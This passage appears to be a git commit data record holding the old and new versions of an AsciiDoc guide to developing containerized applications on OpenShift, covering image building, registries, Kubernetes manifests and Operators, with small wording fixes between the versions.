idea for an application and you want to containerize it.\n\nFirst you require a tool for building a container, like buildah\u00a0or docker,\nand a file that describes what goes in your container, which is typically a\nlink:https:\/\/docs.docker.com\/engine\/reference\/builder\/[Dockerfile].\n\nNext, you require a location to push the resulting container image so you can\npull it to run anywhere you want it to run. This location is a container\nregistry.\n\nSome examples of each of these components are installed by default on most\nLinux operating systems, except for the Dockerfile, which you provide yourself.\n\nThe following diagram displays the process of building and pushing an image:\n\n.Create a simple containerized application and push it to a registry\nimage::create-push-app.png[Creating and pushing a containerized application]\n\nIf you use a computer that runs {op-system-base-full} as the operating\nsystem, the process of creating a containerized application requires the\nfollowing steps:\n\n. Install container build tools: {op-system-base} contains a set of tools that includes\npodman, buildah, and skopeo that you use to build and manage containers.\n. Create a Dockerfile to combine base image and software: Information about\nbuilding your container goes into a file that is named `Dockerfile`. In that\nfile, you identify the base image you build from, the software packages you\ninstall, and the software you copy into the container. You also identify\nparameter values like network ports that you expose outside the container and\nvolumes that you mount inside the container. Put your Dockerfile and the\nsoftware you want to containerized in a directory on your {op-system-base} system.\n. Run buildah or docker build: Run the `buildah build-using-dockerfile` or\nthe `docker build`\u00a0command to pull you chosen base image to the local system and\ncreates a container image that is stored locally.\u00a0You can also build container\nwithout a Dockerfile by using buildah.\n. Tag and push to a registry: Add a tag to your new container image that\nidentifies the location of the registry in which you want to store and share\nyour container. Then push that image to the registry by running the\n`podman push`\u00a0or `docker push` command.\n. Pull and run the image: From any system that has a container client tool,\nsuch as podman\u00a0or docker, run a command that identifies your new image.\nFor example, run the `podman run\u00a0<image_name>` or `docker run <image_name>`\ncommand. Here `<image_name>` is the name of your new container image, which\nresembles `quay.io\/myrepo\/myapp:latest`. The registry might require credentials\nto push and pull images.\n\nifdef::openshift-origin,openshift-enterprise,openshift-webscale[]\nFor more details on the process of building container images, pushing them to\nregistries, and running them, see\nxref:..\/cicd\/builds\/custom-builds-buildah.adoc#custom-builds-buildah[Custom image builds with Buildah].\nendif::openshift-origin,openshift-enterprise,openshift-webscale[]\n\n[id=\"container-build-tool-options\"]\n=== Container build tool options\n\nWhile the Docker Container Engine and `docker`\u00a0command are popular tools\nto work with containers, with {op-system-base} and many other Linux systems, you can\ninstead choose a different set of container tools that includes podman, skopeo,\nand buildah. You can still use Docker Container Engine tools to create\ncontainers that will run in {product-title} and any other container platform.\n\nBuilding and managing containers with buildah, podman, and skopeo\u00a0results in\nindustry standard container images that include features tuned specifically\nfor ultimately deploying those containers in {product-title} or other Kubernetes\nenvironments. These tools are daemonless and can be run without root privileges,\nso there is less overhead in running them.\n\nWhen you ultimately run your containers in {product-title}, you use the\nlink:https:\/\/cri-o.io\/[CRI-O]\u00a0container engine. CRI-O runs on every worker and\nmaster machine in an {product-title} cluster, but CRI-O is not yet supported as\na standalone runtime outside of {product-title}.\n\n[id=\"base-image-options\"]\n=== Base image options\n\nThe base image you choose to build your application on contains a set of\nsoftware that resembles a Linux system to your application. When you build your\nown image, your software is placed into that file system and sees that file\nsystem as though it were looking at its operating system. Choosing this base\nimage has major impact on how secure, efficient and upgradeable\u00a0your container\nis in the future.\n\nRed Hat provides a new set of base images referred to as\nlink:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_enterprise_linux_atomic_host\/7\/html-single\/getting_started_with_containers\/index#using_red_hat_base_container_images_standard_and_minimal[Red Hat Universal Base Images]\u00a0(UBI).\nThese images are based on Red Hat Enterprise Linux and are similar to base\nimages that Red Hat has offered in the past, with one major difference: they\nare freely redistributable without a Red Hat subscription. As a result, you can\nbuild your application on UBI images without having to worry about how they\nare shared or the need to create different images for different environments.\n\nThese UBI images have standard, init, and minimal versions. You can also use the\nlink:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_software_collections\/3\/html-single\/using_red_hat_software_collections_container_images\/index[Red Hat Software Collections]\nimages as a foundation for applications that rely on specific runtime\nenvironments such as Node.js, Perl, or Python. Special versions of some of\nthese runtime base images are referred to as Source-to-Image (S2I) images. With\nS2I images, you can insert your code into a base image environment that is ready\nto run that code.\n\nS2I images are available for you to use directly from the {product-title} web UI\nby selecting *Catalog* -> *Developer Catalog*, as shown in the following figure:\n\n.Choose S2I base images for apps that need specific runtimes\nimage::developer-catalog.png[{product-title} Developer Catalog]\n\n[id=\"understanding-development-registry-options\"]\n=== Registry options\n\nContainer registries are where you store container images so you can share them\nwith others and make them available to the platform where they ultimately run.\nYou can select large, public container registries that offer free accounts or a\npremium version that offer more storage and special features. You can also\ninstall your own registry that can be exclusive to your organization or\nselectively shared with others.\n\nTo get Red Hat images and certified partner images, you can draw from the\nRed Hat Registry. The Red Hat Registry is represented by two locations:\n`registry.access.redhat.com`, which is unauthenticated and deprecated, and\n`registry.redhat.io`, which requires authentication. You can learn about the Red\nHat and partner images in the Red Hat Registry from the\nlink:https:\/\/catalog.redhat.com\/software\/containers\/explore[Container images section of the Red Hat Ecosystem Catalog].\nBesides listing Red Hat container images, it also shows extensive information\nabout the contents and quality of those images, including health scores that are\nbased on applied security updates.\n\nLarge, public registries include link:https:\/\/hub.docker.com\/[Docker Hub]\u00a0and\nlink:https:\/\/quay.io\/[Quay.io]. The Quay.io registry is owned and managed by Red\nHat. Many of the components used in {product-title} are stored in Quay.io,\nincluding container images and the Operators that are used to deploy\n{product-title} itself. Quay.io also offers the means of storing other types of\ncontent, including Helm charts.\n\nIf you want your own, private container registry, {product-title} itself\nincludes a private container registry that is installed with {product-title}\nand runs on its cluster. Red Hat also offers a private version of the Quay.io\nregistry called link:https:\/\/access.redhat.com\/products\/red-hat-quay[Red Hat Quay].\nRed Hat Quay includes geo replication, Git build triggers, Clair image scanning,\nand many other features.\n\nAll of the registries mentioned here can require credentials to download images\nfrom those registries. Some of those credentials are presented on a cluster-wide\nbasis from {product-title}, while other credentials can be assigned to individuals.\n\n[id=\"creating-kubernetes-manifest-openshift\"]\n== Creating a Kubernetes manifest for {product-title}\n\nWhile the container image is the basic building block for a containerized\napplication, more information is required to manage and deploy that application\nin a Kubernetes environment such as {product-title}. The typical next steps after\nyou create an image are to:\n\n* Understand the different resources you work with in Kubernetes manifests\n* Make some decisions about what kind of an application you are running\n* Gather supporting components\n* Create a manifest and store that manifest in a Git repository so you can store\nit in a source versioning system, audit it, track it, promote and deploy it\nto the next environment, roll it back to earlier versions, if necessary, and\nshare it with others\n\n[id=\"understanding-kubernetes-pods\"]\n=== About Kubernetes pods and services\n\nWhile the container image is the basic unit with docker, the basic units that\nKubernetes works with are called\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/pods\/pod-overview\/[pods].\nPods represent the next step in building out an application. A pod can contain\none or more than one container. The key is that the pod is the single unit\nthat you deploy, scale, and manage.\n\nScalability and namespaces are probably the main items to consider when determining\nwhat goes in a pod. For ease of deployment, you might want to deploy a container\nin a pod and include its own logging and monitoring container in the pod. Later,\nwhen you run the pod and need to scale up an additional instance, those other\ncontainers are scaled up with it. For namespaces, containers in a pod share the\nsame network interfaces, shared storage volumes, and resource limitations,\nsuch as memory and CPU, which makes it easier to manage the contents of the pod\nas a single unit. Containers in a pod can also communicate with each other by\nusing standard inter-process communications, such as System V semaphores or\nPOSIX shared memory.\n\nWhile individual pods represent a scalable unit in Kubernetes, a\nlink:https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/service\/[service]\nprovides a means of grouping together a set of pods to create a complete, stable\napplication that can complete tasks such as load balancing.\u00a0A service is also\nmore permanent than a pod because the service remains available from the same\nIP address until you delete it. When the service is in use, it is requested by\nname and the {product-title} cluster resolves that name into the IP addresses\nand ports where you can reach the pods that compose the service.\n\nBy their nature, containerized applications are separated\u00a0from the operating\nsystems where they run and, by extension, their users. Part of your Kubernetes\nmanifest describes how to expose the application to internal and external\nnetworks by defining\nlink:https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/network-policies\/[network policies]\nthat allow fine-grained control over communication with your containerized\napplications. To connect incoming requests for HTTP, HTTPS, and other services\nfrom outside your cluster to services inside your cluster, you can use an\nlink:https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/ingress\/[`Ingress`]\nresource.\n\nIf your container requires on-disk storage instead of database storage, which\nmight be provided through a service, you can add\nlink:https:\/\/kubernetes.io\/docs\/concepts\/storage\/volumes\/[volumes]\nto your manifests\u00a0to make that storage available to your pods. You can configure\nthe manifests to create persistent volumes (PVs) or dynamically create volumes that\nare added to your `Pod` definitions.\n\nAfter you define a group of pods that compose your application, you can define\nthose pods in\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/deployment\/[`Deployment`]\nand xref:..\/applications\/deployments\/what-deployments-are.adoc#what-deployments-are[`DeploymentConfig`] objects.\n\n[id=\"application-types\"]\n=== Application types\n\nNext, consider how your application type influences how to run it.\n\nKubernetes defines different types of workloads that are appropriate for\ndifferent kinds of applications. To determine the appropriate workload for your\napplication, consider if the application is:\n\n* Meant to run to completion and be done.\u00a0An example is an application that\nstarts up to produce a report and exits when the report is complete. The\napplication might not run again then for a month. Suitable {product-title}\nobjects for these types of applications include\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/jobs-run-to-completion\/[`Job`]\nand https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/cron-jobs\/[`CronJob`]\u00a0objects.\n* Expected to run continuously.\u00a0For long-running applications, you can write a\nxref:..\/applications\/deployments\/what-deployments-are.adoc#deployments-kube-deployments[deployment].\n* Required to be highly available.\u00a0If your application requires high\navailability, then you want to size your deployment to have more than one\ninstance. A `Deployment` or `DeploymentConfig` object can incorporate a\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/replicaset\/[replica set]\nfor that type of application. With replica sets, pods run across multiple nodes\nto make sure the application is always available, even if a worker goes down.\n* Need to run on every node.\u00a0Some types of Kubernetes applications are intended\nto run in the cluster itself on every master or worker node. DNS and monitoring\napplications are examples of applications that need to run continuously on every\nnode. You can run this type of application as a\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/daemonset\/[daemon set].\nYou can also run a daemon set on a subset of nodes, based on node labels.\n* Require life-cycle management.\u00a0When you want to hand off your application so\nthat others can use it, consider creating an\nlink:https:\/\/coreos.com\/operators\/[Operator]. Operators let you build in\nintelligence, so it can handle things like backups and upgrades automatically.\nCoupled with the Operator Lifecycle Manager (OLM), cluster managers can expose\nOperators to selected namespaces so that users in the cluster can run them.\n* Have identity or numbering requirements. An application might have identity\nrequirements or numbering requirements.\u00a0For example, you might be\nrequired to run exactly three instances of the application and to name the\ninstances `0`, `1`, and `2`. A\nhttps:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/statefulset\/[stateful set]\nis suitable for this application.\u00a0Stateful sets are most useful for applications\nthat require independent storage, such as databases and zookeeper clusters.\n\n[id=\"supporting-components\"]\n=== Available supporting components\n\nThe application you write might need supporting components, like a database or\na logging component. To fulfill that need, you might be able to obtain the\nrequired component from the following Catalogs that are available in the\n{product-title} web console:\n\n* OperatorHub, which is available in each {product-title} {product-version}\ncluster. The OperatorHub makes Operators available from Red Hat,\ncertified Red Hat partners, and community members to the cluster operator. The\ncluster operator can make those Operators available in all or selected\nnamespaces in the cluster, so developers can launch them and configure them\nwith their applications.\n* Templates, which are useful for a one-off type of application, where the\nlifecycle of a component is not important after it is installed. A template provides an easy\nway to get started developing a Kubernetes application with minimal overhead.\nA template can be a list of resource definitions, which could be `Deployment`,\n`Service`, `Route`,\u00a0or other objects. If you want to change names or resources,\nyou can set these values as parameters in the template.\n\nYou can configure the supporting Operators and\ntemplates to the specific needs of your development team and then make them\navailable in the namespaces in which your developers work.\u00a0Many people add\nshared templates to the `openshift` namespace because it is accessible from all\nother namespaces.\n\n[id=\"applying-manifest\"]\n=== Applying the manifest\n\nKubernetes manifests let you create a more complete picture of the components\nthat make up your Kubernetes applications. You write these manifests as YAML\nfiles and deploy them by applying them to the cluster, for example, by running\nthe `oc apply`\u00a0command.\n\n[id=\"manifest-next-steps\"]\n=== Next steps\n\nAt this point, consider ways to automate your container development process.\nIdeally, you have some sort of CI pipeline\u00a0that builds the images and pushes\nthem to a registry. In particular, a GitOps pipeline integrates your container\ndevelopment with the Git repositories that you use to store the software that\nis required to build your applications.\n\nThe workflow to this point might look like:\n\n* Day 1: You write some YAML. You then run the `oc apply`\u00a0command to apply that\nYAML to the cluster and test that it works.\n* Day 2: You put your YAML container configuration file into your own Git\nrepository. From there, people who want to install that app, or help you improve\nit, can pull down the YAML and apply it to their cluster to run the app.\n* Day 3: Consider writing an Operator for your application.\n\n[id=\"develop-for-operators\"]\n== Develop for Operators\n\nPackaging and deploying your application as an Operator might be preferred\nif you make your application available for others to run. As noted earlier,\nOperators add a lifecycle component to your application that acknowledges that\nthe job of running an application is not complete as soon as it is installed.\n\nWhen you create an application as an Operator, you can build in your own\nknowledge of how to run and maintain the application. You can build in features\nfor upgrading the application, backing it up, scaling it, or keeping track of\nits state. If you configure the application correctly, maintenance tasks,\nlike updating the Operator, can happen automatically and invisibly to the\nOperator's users.\n\nAn example of a useful Operator is one that is set up to automatically back up\ndata at particular times. Having an Operator manage an application\u2019s backup at\nset times can save a system administrator from remembering to do it.\n\nAny application maintenance that has traditionally been completed manually,\nlike backing up data or rotating certificates, can be completed automatically\nwith an Operator.\n","old_contents":"[id=\"understanding-development\"]\n= Understanding {product-title} development\ninclude::modules\/common-attributes.adoc[]\n:context: understanding-development\ntoc::[]\n\nTo fully leverage the capability of containers when developing and running\nenterprise-quality applications, ensure your environment is supported by tools\nthat allow containers to be:\n\n* Created as discrete microservices that can be connected to other\ncontainerized, and non-containerized, services. For example, you might want to\njoin your application with a database or attach a monitoring application to it.\n\n* Resilient, so if a server crashes or needs to go down for maintenance or to be\ndecommissioned, containers can start on another machine.\n\n* Automated to pick up code changes automatically and then start and deploy new\nversions of themselves.\n\n* Scaled up, or replicated, to have more instances serving clients as demand\nincreases and then spun down to fewer instances as demand declines.\n\n* Run in different ways, depending on the type of application. For example, one\napplication might run once a month to produce a report and then exit. Another\napplication might need to run constantly and be highly available to clients.\n\n* Managed so you can watch the state of your application and react when\nsomething goes wrong.\n\nContainers\u2019 widespread acceptance, and the resulting requirements for tools and\nmethods to make them enterprise-ready, resulted in many options for them.\n\nThe rest of this section explains options for\nassets you can create when you build and deploy containerized Kubernetes\napplications in {product-title}. It also describes which approaches you might\nuse for different kinds of applications and development requirements.\n\n[id=\"developing-containerized-applications\"]\n== About developing containerized applications\n\nYou can approach application development with containers in many ways, and\ndifferent approaches might be more appropriate for different situations. To\nillustrate some of this variety, the series of approaches that is presented\nstarts with developing a single container and ultimately deploys that container\nas a mission-critical application for a large enterprise. These approaches\nshow different tools, formats, and methods that you can employ with containerized\napplication development. This topic describes:\n\n* Building a simple container and storing it in a registry\n* Creating a Kubernetes manifest and saving it to a Git repository\n* Making an Operator to share your application with others\n\n[id=\"building-simple-container\"]\n== Building a simple container\n\nYou have an idea for an application and you want to containerize it.\n\nFirst you require a tool for building a container, like buildah\u00a0or docker,\nand a file that describes what goes in your container, which is typically a\nlink:https:\/\/docs.docker.com\/engine\/reference\/builder\/[Dockerfile].\n\nNext, you require a location to push the resulting container image so you can\npull it to run anywhere you want it to run. This location is a container\nregistry.\n\nSome examples of each of these components are installed by default on most\nLinux operating systems, except for the Dockerfile, which you provide yourself.\n\nThe following diagram displays the process of building and pushing an image:\n\n.Create a simple containerized application and push it to a registry\nimage::create-push-app.png[Creating and pushing a containerized application]\n\nIf you use a computer that runs {op-system-base-full} as the operating\nsystem, the process of creating a containerized application requires the\nfollowing steps:\n\n. Install container build tools: {op-system-base} contains a set of tools that includes\npodman, buildah, and skopeo that you use to build and manage containers.\n. Create a Dockerfile to combine base image and software: Information about\nbuilding your container goes into a file that is named `Dockerfile`. In that\nfile, you identify the base image you build from, the software packages you\ninstall, and the software you copy into the container. You also identify\nparameter values like network ports that you expose outside the container and\nvolumes that you mount inside the container. Put your Dockerfile and the\nsoftware you want to containerized in a directory on your {op-system-base} system.\n. Run buildah or docker build: Run the `buildah build-using-dockerfile` or\nthe `docker build`\u00a0command to pull you chosen base image to the local system and\ncreates a container image that is stored locally.\u00a0You can also build container\nwithout a Dockerfile by using buildah.\n. Tag and push to a registry: Add a tag to your new container image that\nidentifies the location of the registry in which you want to store and share\nyour container. Then push that image to the registry by running the\n`podman push`\u00a0or `docker push` command.\n. Pull and run the image: From any system that has a container client tool,\nsuch as podman\u00a0or docker, run a command that identifies your new image.\nFor example, run the `podman run\u00a0<image_name>` or `docker run <image_name>`\ncommand. Here `<image_name>` is the name of your new container image, which\nresembles `quay.io\/myrepo\/myapp:latest`. The registry might require credentials\nto push and pull images.\n\nifdef::openshift-origin,openshift-enterprise,openshift-webscale[]\nFor more details on the process of building container images, pushing them to\nregistries, and running them, see\nxref:..\/cicd\/builds\/custom-builds-buildah.adoc#custom-builds-buildah[Custom image builds with Buildah].\nendif::openshift-origin,openshift-enterprise,openshift-webscale[]\n\n[id=\"container-build-tool-options\"]\n=== Container build tool options\n\nWhile the Docker Container Engine and `docker`\u00a0command are popular tools\nto work with containers, with {op-system-base} and many other Linux systems, you can\ninstead choose a different set of container tools that includes podman, skopeo,\nand buildah. You can still use Docker Container Engine tools to create\ncontainers that will run in {product-title} and any other container platform.\n\nBuilding and managing containers with buildah, podman, and skopeo\u00a0results in\nindustry standard container images that include features tuned specifically\nfor ultimately deploying those containers in {product-title} or other Kubernetes\nenvironments. These tools are daemonless and can be run without root privileges,\nso there is less overhead in running them.\n\nWhen you ultimately run your containers in {product-title}, you use the\nlink:https:\/\/cri-o.io\/[CRI-O]\u00a0container engine. CRI-O runs on every worker and\nmaster machine in an {product-title} cluster, but CRI-O is not yet supported as\na standalone runtime outside of {product-title}.\n\n[id=\"base-image-options\"]\n=== Base image options\n\nThe base image you choose to build your application on contains a set of\nsoftware that resembles a Linux system to your application. When you build your\nown image, your software is placed into that file system and sees that file\nsystem as though it were looking at its operating system. Choosing this base\nimage has major impact on how secure, efficient and upgradeable\u00a0your container\nis in the future.\n\nRed Hat provides a new set of base images referred to as\nlink:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_enterprise_linux_atomic_host\/7\/html-single\/getting_started_with_containers\/index#using_red_hat_base_container_images_standard_and_minimal[Red Hat Universal Base Images]\u00a0(UBI).\nThese images are based on Red Hat Enterprise Linux and are similar to base\nimages that Red Hat has offered in the past, with one major difference: they\nare freely redistributable without a Red Hat subscription. As a result, you can\nbuild your application on UBI images without having to worry about how they\nare shared or the need to create different images for different environments.\n\nThese UBI images have standard, init, and minimal versions. You can also use the\nlink:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_software_collections\/3\/html-single\/using_red_hat_software_collections_container_images\/index[Red Hat Software Collections]\nimages as a foundation for applications that rely on specific runtime\nenvironments such as Node.js, Perl, or Python. Special versions of some of\nthese runtime base images referred to as Source-to-image (S2I) images. With\nS2I images, you can insert your code into a base image environment that is ready\nto run that code.\n\nS2I images are available for you to use directly from the {product-title} web UI\nby selecting *Catalog* -> *Developer Catalog*, as shown in the following figure:\n\n.Choose S2I base images for apps that need specific runtimes\nimage::developer-catalog.png[{product-title} Developer Catalog]\n\n[id=\"understanding-development-registry-options\"]\n=== Registry options\n\nContainer registries are where you store container images so you can share them\nwith others and make them available to the platform where they ultimately run.\nYou can select large, public container registries that offer free accounts or a\npremium version that offer more storage and special features. You can also\ninstall your own registry that can be exclusive to your organization or\nselectively shared with others.\n\nTo get Red Hat images and certified partner images, you can draw from the\nRed Hat Registry. The Red Hat Registry is represented by two locations:\n`registry.access.redhat.com`, which is unauthenticated and deprecated, and\n`registry.redhat.io`, which requires authentication. You can learn about the Red\nHat and partner images in the Red Hat Registry from the\nlink:https:\/\/catalog.redhat.com\/software\/containers\/explore[Container images section of the Red Hat Ecosystem Catalog].\nBesides listing Red Hat container images, it also shows extensive information\nabout the contents and quality of those images, including health scores that are\nbased on applied security updates.\n\nLarge, public registries include link:https:\/\/hub.docker.com\/[Docker Hub]\u00a0and\nlink:https:\/\/quay.io\/[Quay.io]. The Quay.io registry is owned and managed by Red\nHat. Many of the components used in {product-title} are stored in Quay.io,\nincluding container images and the Operators that are used to deploy\n{product-title} itself. Quay.io also offers the means of storing other types of\ncontent, including Helm charts.\n\nIf you want your own, private container registry, {product-title} itself\nincludes a private container registry that is installed with {product-title}\nand runs on its cluster. Red Hat also offers a private version of the Quay.io\nregistry called link:https:\/\/access.redhat.com\/products\/red-hat-quay[Red Hat Quay].\nRed Hat Quay includes geo replication, Git build triggers, Clair image scanning,\nand many other features.\n\nAll of the registries mentioned here can require credentials to download images\nfrom those registries. Some of those credentials are presented on a cluster-wide\nbasis from {product-title}, while other credentials can be assigned to individuals.\n\n[id=\"creating-kubernetes-manifest-openshift\"]\n== Creating a Kubernetes manifest for {product-title}\n\nWhile the container image is the basic building block for a containerized\napplication, more information is required to manage and deploy that application\nin a Kubernetes environment such as {product-title}. The typical next steps after\nyou create an image are to:\n\n* Understand the different resources you work with in Kubernetes manifests\n* Make some decisions about what kind of an application you are running\n* Gather supporting components\n* Create a manifest and store that manifest in a Git repository so you can store\nit in a source versioning system, audit it, track it, promote and deploy it\nto the next environment, roll it back to earlier versions, if necessary, and\nshare it with others\n\n[id=\"understanding-kubernetes-pods\"]\n=== About Kubernetes pods and services\n\nWhile the container image is the basic unit with docker, the basic units that\nKubernetes works with are called\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/pods\/pod-overview\/[pods].\nPods represent the next step in building out an application. A pod can contain\none or more than one container. The key is that the pod is the single unit\nthat you deploy, scale, and manage.\n\nScalability and namespaces are probably the main items to consider when determining\nwhat goes in a pod. For ease of deployment, you might want to deploy a container\nin a pod and include its own logging and monitoring container in the pod. Later,\nwhen you run the pod and need to scale up an additional instance, those other\ncontainers are scaled up with it. For namespaces, containers in a pod share the\nsame network interfaces, shared storage volumes, and resource limitations,\nsuch as memory and CPU, which makes it easier to manage the contents of the pod\nas a single unit. Containers in a pod can also communicate with each other by\nusing standard inter-process communications, such as System V semaphores or\nPOSIX shared memory.\n\nWhile individual pods represent a scalable unit in Kubernetes, a\nlink:https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/service\/[service]\nprovides a means of grouping together a set of pods to create a complete, stable\napplication that can complete tasks such as load balancing.\u00a0A service is also\nmore permanent than a pod because the service remains available from the same\nIP address until you delete it. When the service is in use, it is requested by\nname and the {product-title} cluster resolves that name into the IP addresses\nand ports where you can reach the pods that compose the service.\n\nBy their nature, containerized applications are separated\u00a0from the operating\nsystems where they run and, by extension, their users. Part of your Kubernetes\nmanifest describes how to expose the application to internal and external\nnetworks by defining\nlink:https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/network-policies\/[network policies]\nthat allow fine-grained control over communication with your containerized\napplications. To connect incoming requests for HTTP, HTTPS, and other services\nfrom outside your cluster to services inside your cluster, you can use an\nlink:https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/ingress\/[`Ingress`]\nresource.\n\nIf your container requires on-disk storage instead of database storage, which\nmight be provided through a service, you can add\nlink:https:\/\/kubernetes.io\/docs\/concepts\/storage\/volumes\/[volumes]\nto your manifests\u00a0to make that storage available to your pods. You can configure\nthe manifests to create persistent volumes (PVs) or dynamically create volumes that\nare added to your `Pod` definitions.\n\nAfter you define a group of pods that compose your application, you can define\nthose pods in\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/deployment\/[`Deployment`]\nand xref:..\/applications\/deployments\/what-deployments-are.adoc#what-deployments-are[`DeploymentConfig`] objects.\n\n[id=\"application-types\"]\n=== Application types\n\nNext, consider how your application type influences how to run it.\n\nKubernetes defines different types of workloads that are appropriate for\ndifferent kinds of applications. To determine the appropriate workload for your\napplication, consider if the application is:\n\n* Meant to run to completion and be done.\u00a0An example is an application that\nstarts up to produce a report and exits when the report is complete. The\napplication might not run again then for a month. Suitable {product-title}\nobjects for these types of applications include\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/jobs-run-to-completion\/[`Job`]\nand https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/cron-jobs\/[`CronJob`]\u00a0objects.\n* Expected to run continuously.\u00a0For long-running applications, you can write a\nxref:..\/applications\/deployments\/what-deployments-are.adoc#deployments-kube-deployments[deployment].\n* Required to be highly available.\u00a0If your application requires high\navailability, then you want to size your deployment to have more than one\ninstance. A `Deployment` or `DeploymentConfig` object can incorporate a\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/replicaset\/[replica set]\nfor that type of application. With replica sets, pods run across multiple nodes\nto make sure the application is always available, even if a worker goes down.\n* Need to run on every node.\u00a0Some types of Kubernetes applications are intended\nto run in the cluster itself on every master or worker node. DNS and monitoring\napplications are examples of applications that need to run continuously on every\nnode. You can run this type of application as a\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/daemonset\/[daemon set].\nYou can also run a daemon set on a subset of nodes, based on node labels.\n* Require life-cycle management.\u00a0When you want to hand off your application so\nthat others can use it, consider creating an\nlink:https:\/\/coreos.com\/operators\/[Operator]. Operators let you build in\nintelligence, so it can handle things like backups and upgrades automatically.\nCoupled with the Operator Lifecycle Manager (OLM), cluster managers can expose\nOperators to selected namespaces so that users in the cluster can run them.\n* Have identity or numbering requirements. An application might have identity\nrequirements or numbering requirements.\u00a0For example, you might be\nrequired to run exactly three instances of the application and to name the\ninstances `0`, `1`, and `2`. A\nhttps:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/statefulset\/[stateful set]\nis suitable for this application.\u00a0Stateful sets are most useful for applications\nthat require independent storage, such as databases and zookeeper clusters.\n\n[id=\"supporting-components\"]\n=== Available supporting components\n\nThe application you write might need supporting components, like a database or\na logging component. To fulfill that need, you might be able to obtain the\nrequired component from the following Catalogs that are available in the\n{product-title} web console:\n\n* OperatorHub, which is available in each {product-title} {product-version}\ncluster. The OperatorHub makes Operators available from Red Hat,\ncertified Red Hat partners, and community members to the cluster operator. The\ncluster operator can make those Operators available in all or selected\nnamespaces in the cluster, so developers can launch them and configure them\nwith their applications.\n* Templates, which are useful for a one-off type of application, where the\nlifecycle of a component is not important after it is installed. A template provides an easy\nway to get started developing a Kubernetes application with minimal overhead.\nA template can be a list of resource definitions, which could be `Deployment`,\n`Service`, `Route`,\u00a0or other objects. If you want to change names or resources,\nyou can set these values as parameters in the template.\n\nYou can configure the supporting Operators and\ntemplates to the specific needs of your development team and then make them\navailable in the namespaces in which your developers work.\u00a0Many people add\nshared templates to the `openshift` namespace because it is accessible from all\nother namespaces.\n\n[id=\"applying-manifest\"]\n=== Applying the manifest\n\nKubernetes manifests let you create a more complete picture of the components\nthat make up your Kubernetes applications. You write these manifests as YAML\nfiles and deploy them by applying them to the cluster, for example, by running\nthe `oc apply`\u00a0command.\n\n[id=\"manifest-next-steps\"]\n=== Next steps\n\nAt this point, consider ways to automate your container development process.\nIdeally, you have some sort of CI pipeline\u00a0that builds the images and pushes\nthem to a registry. In particular, a GitOps pipeline integrates your container\ndevelopment with the Git repositories that you use to store the software that\nis required to build your applications.\n\nThe workflow to this point might look like:\n\n* Day 1: You write some YAML. You then run the `oc apply`\u00a0command to apply that\nYAML to the cluster and test that it works.\n* Day 2: You put your YAML container configuration file into your own Git\nrepository. From there, people who want to install that app, or help you improve\nit, can pull down the YAML and apply it to their cluster to run the app.\n* Day 3: Consider writing an Operator for your application.\n\n[id=\"develop-for-operators\"]\n== Develop for Operators\n\nPackaging and deploying your application as an Operator might be preferred\nif you make your application available for others to run. As noted earlier,\nOperators add a lifecycle component to your application that acknowledges that\nthe job of running an application is not complete as soon as it is installed.\n\nWhen you create an application as an Operator, you can build in your own\nknowledge of how to run and maintain the application. You can build in features\nfor upgrading the application, backing it up, scaling it, or keeping track of\nits state. If you configure the application correctly, maintenance tasks,\nlike updating the Operator, can happen automatically and invisibly to the\nOperator's users.\n\nAn example of a useful Operator is one that is set up to automatically back up\ndata at particular times. Having an Operator manage an application\u2019s backup at\nset times can save a system administrator from remembering to do it.\n\nAny application maintenance that has traditionally been completed manually,\nlike backing up data or rotating certificates, can be completed automatically\nwith an Operator.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a4e5ee0b32197e17b4e7c2d3643f1fc9dea67e42","subject":"Fix typo","message":"Fix 